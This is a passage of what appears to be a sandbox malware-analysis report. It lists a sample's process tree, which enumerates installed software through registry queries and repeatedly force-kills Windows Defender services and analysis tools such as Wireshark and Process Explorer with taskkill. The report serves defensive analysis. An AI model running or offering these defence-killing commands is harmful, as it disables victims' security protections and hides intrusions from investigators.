  2⤵
  PID:1036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:1888
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1656
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:868
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1644
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:1316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1928
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:1640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1820
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:1644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1988
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:1876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:1844
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:1408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:280
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:1432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:616
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:268
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1960
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:1504
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:1880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1920
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1676
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1872
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:268
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    PID:1888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:1408
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:1880
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    PID:1308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:1640
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1408
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:1676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1924
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:1932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:1640
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:1676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:868
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    PID:1920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:1968
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1820
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1676
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:584
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1864
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1752
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1900
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2044
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1408
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1932
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1872
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1112
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1920
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1856
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1116
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1644
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1924
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1508
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1440
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1564
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2016
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    PID:1488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:1848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1864
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:2008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:2036
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:584
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    PID:1828
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:1432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:1944
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:1504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    PID:1580
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:1900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:1784
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:1644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:2036
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:576
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:1932
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:1976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:2016
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:1504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:2028
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:1784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2008
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:1996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    PID:1456
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:1652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    PID:1932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1892
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1808
